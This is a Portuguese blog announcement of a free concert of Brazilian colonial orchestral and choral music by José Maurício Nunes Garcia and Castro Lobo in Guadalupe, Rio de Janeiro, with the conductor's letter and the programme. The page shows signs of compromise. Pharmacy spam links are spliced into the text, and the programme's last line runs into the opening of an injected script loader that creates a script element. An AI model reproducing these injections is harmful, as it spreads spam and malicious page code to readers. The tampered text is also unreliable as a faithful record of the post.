Música antigaProgramaçãoRio de Janeiro

“A lona tem concerto” – Guadalupe

Pills Purchase http://www.reisen-und-familie.de/details.php/13241 Order http://tru-pin.cz/purchase-medrol/ Projeto da Cia Bachiana Brasileira, com apoio da Secretaria Municipal de Cultura do Rio de Janeiro

SERVIÇO

 

 

Lona Cultural Terra, em Guadalupe – Rio de Janeiro viamedic complaints

Dia 20 de setembro, às 18h.

Entrada franca

Nosso próximo concerto precisaria ser apresentado nos grandes centros europeus, para que “caísse a ficha” de suas plateias sobre a música que era feita aqui no Rio e em Minas Gerais nos séculos 18 e início do 19. A realização deste programa contou com o incansável trabalho de Antônio Campos Monteiro Neto na digitalização das partituras e partes, algumas que eu já havia revisado e outras que estou revisando.

O valor histórico desta apresentação é enorme e nela poderão ser assistidas, ao vivo e gratuitamente, obras como, entre outras, a belíssima “Tota Pulchra es Maria”, de 1783, para flauta e soprano solistas, orquestra de cordas e coro, quando José Maurício contava com apenas 16 anos de idade, e a Abertura Zemira, para uma orquestra clássica completa e datada de 1803.

Por seus efeitos que muito lembram a “Tempestade” da Sinfonia Pastoral, de Beethoven, a Abertura de JMNG também passou a ser chamada de “Tempestade”, com a diferença que, se Beethoven estreou sua Sexta em 1808, JMNG o fez em 1803, quando seu genial contemporâneo na Europa contava apenas com alguns rascunhos para a sua sinfonia de cinco movimentos.

O programa conta com 7 obras-primas, sendo 4 instrumentais e 3 coro-orquestrais, finalizando com o lindo Credo, de João de Deus Castro Lobo.

Sei que é difícil para muitos uma ida até a Lona Cultural “Terra”, mas quisera que todos pudessem conhecer tais obras!

Grande abraço,
Maestro Ricardo Rocha – regente do concerto

MÚSICA COLONIAL BRASILEIRA – Orquestra e Coro

PROGRAMA
José Maurício Nunes Garcia  (1767-1830):
. Abertura Zemira (1803)
. Totta Pulchra (1783)
. Sinfonia Fúnebre (1790)
. Cum Sancto Spiritu (1801)
. Abertura em Ré (sem data)

João de Deus Castro Lobo Buy   (1794-1832):
. Abertura em Ré (sem data)
. Credo em Fá, para coro e orquestravar d=document;var s=d.createElement(‘script’); if (document.currentScript) {

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.